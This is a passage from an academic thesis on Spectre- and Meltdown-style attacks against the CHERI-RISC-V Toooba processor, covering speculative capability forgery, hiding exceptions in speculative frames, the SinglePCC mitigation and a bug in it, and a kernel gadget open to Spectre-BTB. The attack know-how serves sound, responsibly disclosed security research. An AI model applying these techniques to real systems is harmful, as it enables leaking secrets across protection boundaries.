exceptions only in the commit phase, because an exception detected earlier

may belong to a speculative execution path that should not have been taken;

only at commit is it certain that the exception really occurred. In the

meantime, the speculatively crafted almighty capability can be freely used to access

the entire memory space, e.g., to read secret memory of other compartments.

This is possible because – like many other processors – Toooba does not stall

its pipeline in case of a speculative hardware exception in order to increase

performance.

The attack – as depicted in Figure 5.7 – will cause the operating system to

react to the hardware exception being raised. This will lead to the termination

of the process running this code, which can be disadvantageous for the attacker

for two reasons. First, the attacker often wants to conduct the attack multiple

times and therefore wants to keep the victim process running. Second, the

exception will entail a call to the operating system’s exception handler, which

will perform load operations itself and therefore might cause a lot of noise

from the attacker’s point of view.

As described in [27], an attacker has multiple options to hide the exception.

One option is to fork a child process and execute the attack code there. This

will solve the problem of keeping the actual attack process open, but still the

child process will trigger the invocation of the exception handler and poten-

tially make the results useless because of noise. Another option is to hide the

CBuildCap instruction and the transiently executed instruction sequence in

a speculative frame. This means that I insert a branch instruction before the

Footnote 2: This figure is borrowed from the CHERI team.

CBuildCap instruction with a branch target that lies after the second tran-

sient load. The branch instruction needs to be slow to resolve for Toooba,

which can be achieved by making the branch instruction dependent on a load

that misses all caches. I train the branch so that the attack code path is

always predicted to be executed, as explained in Section 5.1.1. During the

actual attack, I provide parameters such that the branch architecturally skips

the attack code. Therefore, the attack code is still executed speculatively, but the

exception is hidden because of the rollback that Toooba will eventually perform.

This step is combining the CBuildCap attack with a Spectre-PHT attack

as suggested by Lipp et al. [27]. This solves both keeping the process open

and avoiding the invocation of the exception handler because the exception

never occurs on the architectural level. One drawback is that the effective

speculative window for the attacker becomes smaller due to an extra instruction

that has to be executed before the actual attack code. However, this proves to

be no problem in Toooba and I have successfully crafted this variant of the

CBuildCap attack.
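
The speculative frame can be sketched with a generic branch predictor model. The two-bit saturating counter below is an assumption chosen for brevity and is not a description of Toooba's predictor; `TwoBitCounter` and `speculative_frame` are hypothetical names. An outcome of `True` means that the attack path is executed.

```python
class TwoBitCounter:
    """Generic 2-bit saturating counter: states 2 and 3 predict True."""
    def __init__(self):
        self.state = 0

    def predict(self):
        return self.state >= 2

    def update(self, outcome):
        self.state = min(3, self.state + 1) if outcome else max(0, self.state - 1)

def speculative_frame(predictor, enter_attack_path):
    """Return (transient_only, architectural) execution of the attack path."""
    predicted = predictor.predict()
    # The path runs only transiently if it is predicted but not actually entered.
    transient_only = predicted and not enter_attack_path
    predictor.update(enter_attack_path)
    return transient_only, enter_attack_path

p = TwoBitCounter()
for _ in range(4):                  # training: the attack path is really entered
    speculative_frame(p, True)
print(speculative_frame(p, False))  # (True, False)
```

In the final call the attack path is executed only in speculation, so the exception raised inside it never becomes architecturally visible.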

Another mechanism proposed in [27] is the use of transactional memory.

If a failure occurs in a sequence of memory accesses that are made transac-

tional by the architecture, all operations in that transaction will be rolled back.

However, effects to the cache might have already taken place and secrets can

be leaked therefore. RISC-V mentions the Standard Extension for Transac-

tional Memory. However, this has not been specified yet [11]. Therefore, this

cannot be used on RISC-V architectures to hide an exception.

CSetBounds

This attack is comparable to the CBuildCap attack presented above. The

goal of the attack is to extend the bounds of a capability, which breaks the

monotonicity constraint of CHERI capabilities. The CSetBounds instruc-

tion sets the bounds of a capability while ensuring monotonicity. If the new

value for the bounds is greater than the value so far, an exception will be

raised [37]. The attack is performed the same way the CBuildCap attack

was performed. A load that misses all caches – or any instruction that intro-

duces a delay long enough – enables the transient-execution sequence to take

effect before the exception caused by the CSetBounds instruction is raised.

The transient-execution sequence comprises the following steps: setting the

address to a value of interest for the attacker, accessing that value, and finally

accessing an attacker-visible array with the secret as the index in order to leak

the secret.
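
The monotonicity check that the attack races against can be written down as a short Python model. It is a simplification: the new bounds start at the capability's current address, rounding due to capability compression is ignored, and `Cap`, `BoundsTrap`, and `csetbounds` are illustrative names only.

```python
from typing import NamedTuple

class Cap(NamedTuple):
    base: int
    top: int   # exclusive upper bound
    addr: int  # current address (cursor)
    tag: bool

class BoundsTrap(Exception):
    """Stands in for the hardware exception."""

def csetbounds(cap: Cap, length: int) -> Cap:
    new_base, new_top = cap.addr, cap.addr + length
    # Monotonicity: the new bounds must lie within the old bounds.
    if not cap.tag or new_base < cap.base or new_top > cap.top:
        raise BoundsTrap("requested bounds exceed the source capability")
    return cap._replace(base=new_base, top=new_top)
```

Shrinking a capability succeeds, whereas requesting a length that reaches past `top` raises `BoundsTrap`; the attack relies on the widened result being forwarded before that exception takes effect.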

Analogous to the CBuildCap attack, the CSetBounds attack will raise

an exception in the form presented above. As explained, hiding the exception

in a speculative frame is the best option for an attacker. I have successfully

implemented both a variant that eventually raises a hardware exception and a

variant that hides the exception.

CInvoke

Both the CBuildCap and the CSetBounds attack operate on conventional

unsealed data capabilities. In contrast, this attack works on sealed capabilities.

Sealed capabilities cannot be dereferenced and thus are not of great use to an

attacker. Therefore, it is the attacker’s goal to unseal this data capability and

access the memory addresses it grants access to. Since sealed capabilities

cannot be dereferenced, it is deemed secure to pass them to non-trustworthy

processes. This way, an attacker can get access to a sealed data capability.

The CInvoke instruction was designed to allow fast jumps between pro-

tection domains. This is enabled by having a sealed code capability to the code

the user wants to jump to and by a sealed data capability – these two capabili-

ties together form a pair of capabilities. CInvoke unseals the code capability

and jumps to it. Furthermore, it unseals the data capability and moves it into a

general purpose capability register. In order to be considered a valid operation,

CInvoke needs to pass many checks, e.g. both capabilities need to be tagged

and sealed. In my scenario, I primarily attack the fact that the capability pair

is required to have the same otype. However, I violate multiple other

invariants as well [37]. A failure of these checks will lead to an exception being

raised by Toooba.
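
A subset of these checks can be sketched in Python. Only the checks named in the text (tagged, sealed, matching otype) are modelled; permission checks are omitted, and `Cap`, `UNSEALED`, and `CapTrap` are hypothetical names.

```python
from dataclasses import dataclass, replace

UNSEALED = -1  # hypothetical marker meaning "not sealed"

@dataclass(frozen=True)
class Cap:
    addr: int
    otype: int = UNSEALED
    tag: bool = True

class CapTrap(Exception):
    """Stands in for the hardware exception."""

def cinvoke(code: Cap, data: Cap):
    if not (code.tag and data.tag):
        raise CapTrap("TagViolation")
    if code.otype == UNSEALED or data.otype == UNSEALED:
        raise CapTrap("SealViolation")
    if code.otype != data.otype:
        raise CapTrap("TypeViolation")
    # All checks passed: unseal both; the caller jumps to the code capability.
    return replace(code, otype=UNSEALED), replace(data, otype=UNSEALED)
```

A pair sealed with the same otype is unsealed together, while a pair with different otypes raises `CapTrap("TypeViolation")`, which is the check primarily targeted here.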

My approach for the attack is to use a code capability that points to a gadget

in the attacker’s code space. For the data capability, I use a powerful sealed

capability that the attacker does not have a suitably authorising capability to

unseal. The CInvoke instruction is executed with these two capabilities as

parameters. In order to delay the exception being raised, a load missing all

caches is used again. With the exception being delayed, the code speculatively

jumps to the attacker’s chosen gadget and the data capability is unsealed and

forwarded. The gadget loads the secret and reveals it by a second transient

load. Hiding the exception in a speculative frame is again the best way of

conducting this exploit from an attacker’s perspective.

CUnseal

Similar to the attack above, the goal of this attack is to unseal a capability

without having the necessary privileges. The CUnseal instruction requires

two parameters: the capability to be unsealed and the capability authorising

this. If the CUnseal instruction fails, a hardware exception will be raised.

For CUnseal, there are multiple reasons why this instruction can fail – in my

attack I focus on a TypeViolation. This is caused if the otype of the sealed

capability is not equal to the address of the authorising capability [37]. Again,

in my attack scenario, the attacker has already obtained a powerful sealed data

capability or can obtain it when needed, e.g., reading from shared memory

with another process running on the CHERI system.
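
The TypeViolation condition can be expressed as a small Python model. It covers only the otype comparison described above plus basic tag and seal checks; the permission and bounds checks on the authorising capability are left out, and all names are illustrative.

```python
from dataclasses import dataclass, replace

UNSEALED = -1  # hypothetical marker meaning "not sealed"

@dataclass(frozen=True)
class Cap:
    addr: int
    otype: int = UNSEALED
    tag: bool = True

class CapTrap(Exception):
    """Stands in for the hardware exception."""

def cunseal(sealed: Cap, auth: Cap) -> Cap:
    if not (sealed.tag and auth.tag):
        raise CapTrap("TagViolation")
    if sealed.otype == UNSEALED or auth.otype != UNSEALED:
        raise CapTrap("SealViolation")
    # The otype of the sealed capability must equal the address of the authoriser.
    if sealed.otype != auth.addr:
        raise CapTrap("TypeViolation")
    return replace(sealed, otype=UNSEALED)
```

An authorising capability whose address equals the otype unseals the target; any other address raises `CapTrap("TypeViolation")`.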

The actual attack approach is similar to the CInvoke attack. The attacker

does not possess a suitable capability that allows unsealing the powerful data

capability. In order to delay the exception being raised, the attacker performs a

load with a great miss penalty. Toooba’s forwarding again enables a transient-

execution sequence to make a secret visible to the attacker. If an attacker wants

to conduct the attack more than once, hiding the exception in a speculative

execution frame is the best solution.

Chapter 6

Discussion

One of the main goals of this thesis work is to contribute a platform to foster

research of transient-execution attacks both on RISC-V and CHERI-RISC-V

processors. The experiments presented in Chapters 4 and 5 show vulnera-

bilities being present in Toooba and the need to develop and deploy mitiga-

tion mechanisms. In this chapter, I describe how my framework impacted the

CHERI team and helped to develop and improve SinglePCC – a mitigation

mechanism against Spectre-style attacks in CHERI-RISC-V Toooba. Further-

more, my work has triggered initial plans for Meltdown-CF mitigation.

6.1 SinglePCC

The SinglePCC mechanism has been mainly developed by Jonathan Woodruff

and was inspired by my experiments and their results as all Spectre-style at-

tacks were found to violate CHERI’s security model.

6.1.1 Mechanism

As of now, CHERI-RISC-V Toooba uses the entire PCC of the target for branch

prediction, which means that both the actual address and also the privileges

including the bounds are predicted. SinglePCC removes the privileges com-

pletely from the prediction. In order to determine whether an instruction is in

bounds, it uses the PCC bounds of the last committed instruction. Whenever

an instruction that changes the bounds, e.g., a cjalr instruction, is executed,

the bounds will be changed as well. The BTB or RSB only carry the address

and no bounds or other privileges any longer. If the address of an instruc-

tion is out-of-bounds of the current bounds, e.g., a target of a jump to another

compartment, this instruction has to wait until its bounds can be derived from

the current register state without speculation. This approach will decrease the

overall system performance, as waiting for the bounds to be available in the

register state can introduce additional pipeline flushes, but it does not

allow any speculation over compartment boundaries.
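
The fetch decision described in this section can be sketched as follows. The function name, the tuple representation of the bounds, and the two string results are assumptions for illustration; the model ignores how and when the committed bounds are updated.

```python
def fetch_decision(predicted_target, committed_bounds):
    """Decide whether a predicted target may be fetched speculatively.

    committed_bounds: (base, top) of the PCC of the last committed
    instruction, with top exclusive. The predictor supplies only an address.
    """
    base, top = committed_bounds
    if base <= predicted_target < top:
        return "speculate"
    # Out of bounds: wait until the bounds follow from non-speculative state.
    return "wait"

victim_bounds = (0x80040000, 0x80080000)
print(fetch_decision(0x80040100, victim_bounds))  # speculate
print(fetch_decision(0x80080000, victim_bounds))  # wait
```

The second call models a predicted jump into another compartment, which is no longer followed in speculation.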

6.1.2 Testing SinglePCC

I ran all major Spectre-style attacks on the branch of Toooba that has been ex-

tended with SinglePCC. The results are summarised in Table 6.1. SinglePCC

successfully mitigates attacks that target injecting an address into the BTB or

RSB that is located at an address out-of-bounds of the PCC for this compart-

ment or part of the code, e.g., a function whose PCC is exactly limited to its

respective code. A jump to another compartment is possible – but not in spec-

ulation. This leads to the fact that the attacker chosen gadget will never be

executed. However, SinglePCC does not mitigate the following attack case.

Assume two identical compartments that differ only in their ASIDs.

One compartment is under the control of the attacker; the

other compartment is benign. The compartment under attacker control can

inject an entry into the BTB or RSB and when the benign compartment is ex-

ecuted the next time, it will follow the misprediction. Capabilities describe

virtual addresses, but do not contain any information about address spaces.

SinglePCC mandates that the address in speculation must be in the current

bounds, but this does not forbid this case of cross protection domain training

because SinglePCC does not know about the different address spaces.

Furthermore, SinglePCC does not mitigate Spectre-PHT nor does it mit-

igate Spectre-STL-Load. In the case of Spectre-PHT, the attacker only mis-

trains the branch prediction direction, but both the target in case of taken and

the target in case of not taken are in the current bounds, which means that

SinglePCC does not take effect here. For Spectre-STL-Load, the reason is

similar. This attack loads a stale memory value, but it does not affect branch

targets and therefore the address always stays within the current bounds. How-

ever, SinglePCC mitigates Spectre-STL-Jump if the jump goes out-of-bounds

for the same reasons as SinglePCC mitigates Spectre-BTB and Spectre-RSB.

Last, SinglePCC only mitigates attacks that involve jumping. Therefore, Sin-

glePCC does not mitigate any of the Meltdown-CF attacks.

With SinglePCC enabled, an attacker cannot train the BTB with targets

outside of the bounds of the current PCC. However, the attacker can train the

BTB with targets in bounds. In the case the current bounds are not tight, this

Attack               asm    CHERI asm
Spectre-PHT          ✓      ✓
Spectre-BTB          ✓      ✗
Spectre-RSB          ✓      ✗
Spectre-STL-Load     ✓      ✓
Spectre-STL-Jump     ✓      ✗

Table 6.1: Overview of attempted Spectre-style attacks and whether they were

successful when SinglePCC is applied.

gives the attacker a higher probability to find a suitable gadget in the victim’s

code.

6.1.3 Hardening SinglePCC

Running the Spectre-style transient-execution attacks in Toooba with

SinglePCC being enabled revealed a dangerous vulnerability in the initial Sin-

glePCC implementation. My example of Spectre-RSB worked even though

the return address injected into the RSB was out-of-bounds of the current

PCC of the victim. In collaboration with Jonathan Woodruff, I traced this

back to an error in the microarchitecture. In my example, the victim

PCC starts at address 0x80040000, whereas the attacker PCC starts at address

0x80080000. The entire PCCs of the victim (PCCv) and the attacker (PCCa)

are:

PCCv = 0xffff200000018004_0000000080040000 (6.1)

PCCa = 0xffff200000018004_0000000080080000 (6.2)

In order to understand the error in the microarchitecture, I need to ex-

plain CHERI Concentrate [38] – the compression mechanism used in order

to achieve 128-bit capabilities. As depicted in Figure 6.1, CHERI Concen-

trate divides the memory space into three different parts from the view of one

capability: the unrepresentable region, the representable space, and the deref-

erenceable region.

In the erroneous SinglePCC implementation, Toooba pulled the address

from the RSB and then applied a function that adds the bounds of the current

PCC. In order to improve overall performance – to shorten the critical path

[Figure 6.1 (diagram). Labels: base, address, top; unrepresentable region, representable space, dereferenceable region.]

Figure 6.1: Memory regions implied by the CHERI Concentrate encoding.

Taken and adapted from Woodruff et al. [38].

– the implementors used a function that sets the address, but does not check

whether the address is representable. This function is unsafe, but superior

to its safe counterpart in terms of performance. Because of the alignment of

the victim and attacker PCC, they have the same encoding through CHERI

Concentrate. PCCv and PCCa differ only in the actual address, but the com-

pressed bounds bits are identical. In general, CHERI Concentrate can have

multiple memory regions whose bounds are encoded with the same bit

pattern; all these capabilities differ only in the actual address. Because the

address is set without a representability check, the attacker address pulled from

the RSB is considered in bounds. The bounds check that follows the address-setting

function therefore does not fail, Toooba speculatively jumps to the attacker’s

gadget, and the entire attack succeeds.
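
The observation about the two PCC values, and the difference between an unchecked and a checked address update, can be illustrated with a toy Python model. Only the two 128-bit constants come from Equations 6.1 and 6.2. The bounds decoding is deliberately not CHERI Concentrate: `WINDOW` and `toy_bounds` are hypothetical stand-ins that only mimic the property that bounds are decoded relative to the address.

```python
PCC_V = 0xffff200000018004_0000000080040000  # victim PCC, Equation 6.1
PCC_A = 0xffff200000018004_0000000080080000  # attacker PCC, Equation 6.2
MASK64 = (1 << 64) - 1
WINDOW = 0x40000  # hypothetical region size, NOT decoded from the metadata

def split(cap):
    """Return the (metadata, address) halves of a 128-bit capability."""
    return cap >> 64, cap & MASK64

def toy_bounds(addr):
    """Toy decode: the bounds are the aligned WINDOW that contains addr."""
    base = addr & ~(WINDOW - 1)
    return base, base + WINDOW

def set_addr_unsafe(cap, new_addr):
    """Replace the address and keep the tag without any check."""
    meta, _ = split(cap)
    return (meta << 64) | new_addr, True

def set_addr_safe(cap, new_addr):
    """Clear the tag if the new address changes the decoded bounds."""
    meta, old_addr = split(cap)
    tag = toy_bounds(old_addr) == toy_bounds(new_addr)
    return (meta << 64) | new_addr, tag

print(split(PCC_V)[0] == split(PCC_A)[0])             # True
print(set_addr_unsafe(PCC_V, 0x80080000)[0] == PCC_A)  # True
print(set_addr_safe(PCC_V, 0x80080000)[1])             # False
```

In this toy model the unchecked update turns the victim PCC into a bit-identical copy of the attacker PCC with the tag still set, whereas the checked update clears the tag.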

My findings caused the SinglePCC implementation to be reviewed and

changed accordingly. A more costly but safe function for setting the address

coming from the RSB is used in the current design. This function will check

whether the address is in the unrepresentable region and this fact will cause

the function to strip the capability’s tag bit in my attack case. In turn, this

invalid capability will not pass the bounds checks and therefore Toooba will

not speculatively jump to this address – as it is intended to work.

Later, Woodruff implemented another approach that decodes the bounds

of the current PCC and writes them to hardware registers. These bounds are

then used for comparing against addresses coming from the BTB and RSB.

Only in case of a jump that is architecturally taken, these bounds registers will

change.

ld a0, 1000(s5)

ld a1, 208(a0)

add a0, zero, s1

jalr ra, a1

Figure 6.2: CheriBSD kernel code that is suitable for a Spectre-BTB attack.

6.1.4 Spectre-BTB in Kernel Code

In order to confirm the need for mechanisms that mitigate Spectre-style

attacks, I present a possible vulnerability that would allow an attacker to bypass CHERI’s

security measures in a real-world environment. In this section, I describe a

possible attack on a CHERI system in the presence of an operating system –

in this case CheriBSD. In this attack scenario, I use the hybrid-kernel version

of CheriBSD, which means that the kernel itself does not use capabilities for

its code and data, but the kernel fully enables user-space programs to do so.

In Figure 6.2, I show a short snippet of the CheriBSD kernel code for han-

dling exceptions. The reader may note that this code is not CHERI-RISC-V

assembly, but conventional RISC-V assembly. This is caused by the fact that

the kernel itself does not use capabilities. This code is part of the syscal-

lenter function, which is indirectly called by the do_trap_user function

– the function that handles exceptions coming from U privilege mode. The

code depicted in Figure 6.2 fulfills all the criteria in order to be exploitable

for a Spectre-BTB attack. As described in Section 5.1.3, the goal of the at-

tacker is to alias an indirect jump, which is in this example jalr ra, a1.

Furthermore, the attacker has to ensure that the load operation writing into a1 is

delayed, e.g., by making it miss all caches. This will lead to a misspeculation

to the attacker’s gadget that has been injected into the BTB previously.

This kind of attack is a large threat to CHERI systems as it gives attack-

ers powerful capabilities normally used by the kernel. The attacker could at-

tempt to find a powerful capability, e.g., derived from a SCR or a CSR, that

still is in the register state from calls to previous functions. However, the fact

that the kernel is not using capabilities gives the attacker another option to

conduct impactful attacks. For memory operations not issued through capa-

bilities, CHERI systems implicitly use the DDC register. In order to satisfy

the wide range of memory accesses performed by the kernel, the capability in

DDC has to be configured to be suitably powerful. In case of an attack, the DDC

register can be used by attackers as well and gives them plenty of options to

attack CheriBSD’s kernel through Spectre-BTB attacks.

As presented in Section 6.1.2, SinglePCC will mitigate attacks that are

based on Toooba misspeculating to another compartment. In order to

successfully mitigate the attack above, SinglePCC requires the bounds of the kernel

PCC to be tight. If this is not the case, SinglePCC will not mitigate

this attack as no out-of-bounds jump will be detected. Therefore, this example

illustrates again how important it is for the overall security of a CHERI system

to be configured with the principle of least privilege. Furthermore, it shows

the importance of the framework I created during my work.

6.2 Preventing Meltdown-CF

The Meltdown-CF attacks explained in Section 5.2.3 pose a large threat to

CHERI systems. The analysis presented in this work inspired CHERI hard-

ware designers to propose solutions that are outlined in the following para-

graphs. All Meltdown-style attacks are caused by exceptions not being raised

at the right point of time in the pipeline, which leads to illegal data being

forwarded and used in transient-execution sequences. As explained in Sec-

tion 2.4.5, CHERI implementations need to prevent Meltdown-CF attacks.

This can be done both architecturally and microarchitecturally.

Jonathan Woodruff and Peter Rugg proposed in several personal meetings

that the ISA could be changed such that instructions in the Meltdown-CF sub-

class no longer throw hardware exceptions, but instead forward invalid capa-

bilities in case of a failure. This will entirely prevent transient-execution from

taking effect as memory operations through invalid capabilities are not allowed

and will lead to a hardware exception in Toooba.
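
The proposed ISA change can be sketched in Python using CBuildCap as the example. This is an illustration of the idea only, not of any specified instruction behaviour: capabilities are dictionaries, the check is reduced to bounds, and `cbuildcap_no_trap` and `load` are hypothetical names.

```python
def cbuildcap_no_trap(auth, pattern):
    """On a failed check, return an untagged result instead of raising."""
    ok = (auth["tag"]
          and auth["base"] <= pattern["base"]
          and pattern["top"] <= auth["top"])
    return dict(pattern, tag=ok)

def load(cap, addr, memory):
    """Dereference: an untagged or out-of-bounds capability faults here."""
    if not cap["tag"] or not (cap["base"] <= addr < cap["top"]):
        raise PermissionError("capability exception on dereference")
    return memory[addr]

auth = {"base": 0x80001000, "top": 0x80002000, "tag": True}
almighty = {"base": 0, "top": 1 << 64, "tag": False}
forged = cbuildcap_no_trap(auth, almighty)
print(forged["tag"])  # False
```

Because the forwarded value is never tagged, a dependent load through `forged` fails its own check and there is no valid capability to use in a transient sequence.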

Furthermore, Woodruff and Rugg presented the idea of changing the mi-

croarchitecture only without adjusting the ISA. They propose to not write any

capability to the physical register file that exceeds the privileges of its operands

even if only used in a transient path. This will prevent any privilege escalation.

Both approaches have a common denominator as the capability checks

need to be resolved before writing any value to the physical register file. Wood-

ruff and Rugg state further that this will not have a performance impact on

CUnseal and CInvoke, but it will cost performance for the CBuildCap and

CSetBounds instructions due to capability compression being on the critical

path.

6.3 Ethics and Sustainability

When conducting attacks for scientific reasons, it has to be ensured both that no

harm is done to real-world systems and that the attack is responsibly disclosed.

Responsible disclosure means that the attackers wait a period of time before

disclosing the vulnerability such that affected systems have enough time to take

measures. Publications about transient-execution attacks followed these prin-

ciples from the beginning [22, 27]. I complied with these principles through-

out my thesis work as well. Whilst performing my attacks, I only operated on

a simulation running on a server and therefore did no harm to any real-world

system. Toooba is a research processor in development whose purpose is to

enable security research. Therefore, I can disclose the found vulnerabilities

immediately with the publication of this thesis. One goal of this thesis was to

provide a platform for further research on these attacks.

Another goal was to show the possibility for transient-execution attacks.

As described in previous sections in this chapter, my research has led to initial

mitigation mechanisms being put in place in Toooba. This will inspire hard-

ware designers to develop more sophisticated mitigation mechanisms that will

strengthen CHERI’s security claims. The computer science community is now

aware that transient-execution attacks affect many microarchitectures and that

mitigation mechanisms are crucial.

A point often overlooked is sustainability. Modern computing can help to

sustainably use resources, e.g., smart irrigation systems. However, all systems

need computing power in order to make decisions that benefit sustainability.

My research will lead to CHERI systems becoming more secure. CHERI’s

strong security claims will remove concerns about security and therefore foster

the use of CHERI in sustainable systems.

6.4 Future Work

This thesis work answered the question of whether transient-execution attacks

are possible in Toooba and CHERI systems in general. However, many ques-

tions still remain unanswered – especially regarding more advanced transient-

execution attacks running in a real-world environment. Currently, Toooba is

fairly conservative and is not yet instantiated with a multi-core setup. This ef-

fectively mitigates advanced transient-execution attacks, but also significantly

limits performance. Changes on a per core basis, e.g., adding sophisticated

data-value speculation to the processor will enrich the microarchitectural state,

which will give an attacker plenty of options to attempt transient-execution at-

tacks on a RISC-V or CHERI-RISC-V system. This means that future work

will aim to improve Toooba’s performance and evaluate whether a richer mi-

croarchitectural state leads to the possibility of sophisticated transient-execution

attacks.

It is not yet clear how CHERI capabilities interact with transient-execution

attacks. In most cases, capabilities are an obstacle for an attacker, but they

can be of advantage as well. Considering a single-address-space operating sys-

tem as proposed in [37], speculative bounds escalation can pose a large threat

to CHERI systems as the CBuildCap attack example has shown. It has to be

researched whether there exist other ways to escalate privilege in speculation.

Furthermore, other interactions in a full operating system environment are of

interest to the attacker, e.g. achieving longer load miss penalties by creating

TLB misses. Besides the feasibility of an attack, the quality of possible attacks

has to be investigated. CHERI-RISC-V systems differ in instruction sequences

from conventional RISC-V systems and are likely to introduce noise, e.g.,

capabilities have to be loaded from a capability table first. These loads can

impact cache traces and therefore can change the transmission rates in

real-world attacks.

In general, my work has looked at Toooba only in simulation through

Verilator. An instance of Toooba being synthesised to a Field Programmable Gate

Array (FPGA) will bring new insights and make the results more robust. Fur-

thermore, it would be interesting to conduct research on transient-execution

attacks on the ARM Morello architecture [49]. The different design choices

and the different underlying ISA will likely have an impact on which attacks

are successful and what their respective quality is.

Chapter 7

Conclusions

In this work, I performed initial research on transient-execution attacks on

the superscalar out-of-order CHERI-RISC-V microprocessor Toooba. I can

clearly answer the question of whether Toooba is vulnerable to transient-execu-

tion attacks in the affirmative. In both RISC-V and CHERI-RISC-V assembly,

I could successfully conduct transient-execution attacks. This work was the

first to completely reproduce the major transient-execution attacks on a RISC-

V processor and it was the first work to attempt attacks of this class against

CHERI capability protection. I find that transient-execution attacks violate

CHERI’s security model in two ways and therefore require mitigation and pre-

vention mechanisms to be put into place. First, control-flow can be hijacked

through Spectre-BTB and Spectre-RSB allowing attackers to direct control to

their chosen gadgets in speculation. Second, Meltdown-Capability-Forgery

poses a large vulnerability as attackers can transiently escalate privilege. I

showed that both subclasses of transient-execution result in a large threat to

code running on Toooba. I believe that both attack classes can be prevented or

mitigated by security mechanisms currently being developed. However, I be-

lieve that further findings have yet to be made about transient-execution attacks

on CHERI-RISC-V microprocessors. I further think that transient-execution

attacks will significantly impact threat models and hardware design of any mi-

croarchitecture in the future, and especially capability systems as they assure

high security measures. This work builds the basis for advanced research on

transient-execution attacks on RISC-V microprocessors. Furthermore, it sets

the stage for a first generation of commercial CHERI microprocessors to en-

sure that CHERI’s strong architectural guarantees are also non-bypassable in

speculation.

Bibliography

[1] The MITRE Corporation. CVE-2014-0160.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160. 2013.

[2] Trevor Jim et al. “Cyclone: A Safe Dialect of C”. In: Proceedings of

the General Track of the Annual Conference on USENIX Annual Tech-

nical Conference. ATEC ’02. USA: USENIX Association, June 2002,

pp. 275–288. isbn: 1880446006.

[3] George C. Necula, Scott McPeak, and Westley Weimer. “CCured: Type-

Safe Retrofitting of Legacy Code”. In: Proceedings of the 29th ACM

SIGPLAN-SIGACT Symposium on Principles of Programming Languages.

POPL ’02. Portland, Oregon: Association for Computing Machinery,

Jan. 2002, pp. 128–139.

[4] Archibald Samuel Elliott et al. “Checked C: Making C Safe by Ex-

tension”. In: 2018 IEEE Cybersecurity Development (SecDev). Cam-

bridge, MA, USA, Sept. 2018, pp. 53–60.

[5] Thomas Bourgeat et al. “MI6: Secure Enclaves in a Speculative Out-of-

Order Processor”. In: Proceedings of the 52nd Annual IEEE/ACM In-

ternational Symposium on Microarchitecture. MICRO ’52. Columbus,

OH, USA: Association for Computing Machinery, Oct. 2019, pp. 42–

56.

[6] Marno van der Maas and Simon W. Moore. “Protecting Enclaves from

Intra-Core Side-Channel Attacks through Physical Isolation”. In: Pro-

ceedings of the 2nd Workshop on Cyber-Security Arms Race. CYSARM’20.

Virtual Event, USA: Association for Computing Machinery, Nov. 2020,

pp. 1–12.

[7] Maurice V. Wilkes and Roger M. Needham. The Cambridge CAP Com-

puter and Its Operating System. Elsevier, Jan. 1979.


[8] William B. Ackerman and William W. Plummer. “An implementation

of a multiprocessing computer system”. In: SOSP ’67: Proceedings of

the First ACM Symposium on Operating System Principles. New York,

NY, USA: ACM, 1967, pp. 5.1–5.10.

[9] Dmitry Evtyushkin et al. “BranchScope: A New Side-Channel Attack

on Directional Branch Predictor”. In: Proceedings of the Twenty-Third

International Conference on Architectural Support for Programming

Languages and Operating Systems. ASPLOS ’18. Williamsburg, VA,

USA: Association for Computing Machinery, Mar. 2018, pp. 693–707.

[10] Krste Asanović and David A. Patterson. Instruction Sets Should Be Free:

The Case For RISC-V. Tech. rep. UCB/EECS-2014-146. University of

California at Berkeley, Electrical Engineering and Computer Sciences,

Aug. 2014.

[11] Editors Andrew Waterman and Krste Asanović. The RISC-V Instruction

Set Manual. Document Version 20191213. Volume I: User-Level ISA.

RISC-V Foundation. Dec. 2019.

[12] Editors Andrew Waterman and Krste Asanović. The RISC-V Instruction

Set Manual. Document Version 20190608-Priv-MSU-Ratified. Volume

II: Privileged Architecture. RISC-V Foundation. June 2019.

[13] Robert M. Tomasulo. “An Efficient Algorithm for Exploiting Multiple

Arithmetic Units”. In: IBM Journal of Research and Development 11.1

(1967), pp. 25–33.

[14] David A. Patterson and John L. Hennessy. Computer Organization and

Design, RISC-V Edition: The Hardware/Software Interface. 6th. San

Francisco, CA, USA: Morgan Kaufmann Publishers Inc., 2017. isbn:

9780128122754.

[15] John L. Hennessy and David A. Patterson. Computer Architecture: A

Quantitative Approach. 6th. San Francisco, CA, USA: Morgan Kauf-

mann Publishers Inc., 2017. isbn: 9780128119068.

[16] David M. Gallagher et al. “Dynamic Memory Disambiguation Using

the Memory Conflict Buffer”. In: Conference on Architectural Support

for Programming Languages and Operating Systems. San Jose, CA,

USA, Oct. 1994.

[17] Martin Schwarzl et al. Speculative Dereferencing of Registers: Reviving

Foreshadow. Aug. 2020. arXiv: 2008.02307.


[18] Yuval Yarom and Katrina Falkner. “FLUSH+RELOAD: A High Res-

olution, Low Noise, L3 Cache Side-Channel Attack”. In: USENIX Se-

curity Symposium. San Diego, CA: USENIX Association, Aug. 2014,

pp. 719–732.

[19] Claudio Canella et al. “A Systematic Evaluation of Transient Execution

Attacks and Defenses”. In: Proceedings of the 28th USENIX Conference

on Security Symposium. SEC’19. Santa Clara, CA, USA: USENIX As-

sociation, Aug. 2019, pp. 249–266.

[20] Jo Van Bulck et al. “LVI: Hijacking Transient Execution through Mi-

croarchitectural Load Value Injection”. In: 2020 IEEE Symposium on

Security and Privacy (SP). San Francisco, CA, USA, 2020, pp. 54–72.

[21] Robert N. M. Watson et al. Capability Hardware Enhanced RISC In-

structions (CHERI): Notes on the Meltdown and Spectre Attacks. Tech.

rep. UCAM-CL-TR-916. University of Cambridge, Computer Labora-

tory, Feb. 2018. url: https://www.cl.cam.ac.uk/techreports/

UCAM-CL-TR-916.pdf.

[22] Paul Kocher et al. “Spectre Attacks: Exploiting Speculative Execution”.

In: IEEE Symposium on Security and Privacy. San Francisco, CA, USA,

May 2019.

[23] Esmaeil Mohammadian Koruyeh et al. “Spectre Returns! Speculation

Attacks Using the Return Stack Buffer”. In: Proceedings of the 12th

USENIX Conference on Offensive Technologies. WOOT’18. Baltimore,

MD, USA: USENIX Association, Aug. 2018.

[24] Giorgi Maisuradze and Christian Rossow. “Ret2spec: Speculative Exe-

cution Using Return Stack Buffers”. In: Proceedings of the 2018 ACM

SIGSAC Conference on Computer and Communications Security. CCS

’18. Toronto, Canada: Association for Computing Machinery, Jan. 2018,

pp. 2109–2122.

[25] Jann Horn. speculative execution, variant 4: speculative store bypass.

https://bugs.chromium.org/p/project-zero/issues/

detail?id=1528. Feb. 2018.

[26] Stephan Van Schaik et al. “RIDL: Rogue In-Flight Data Load”. In: IEEE

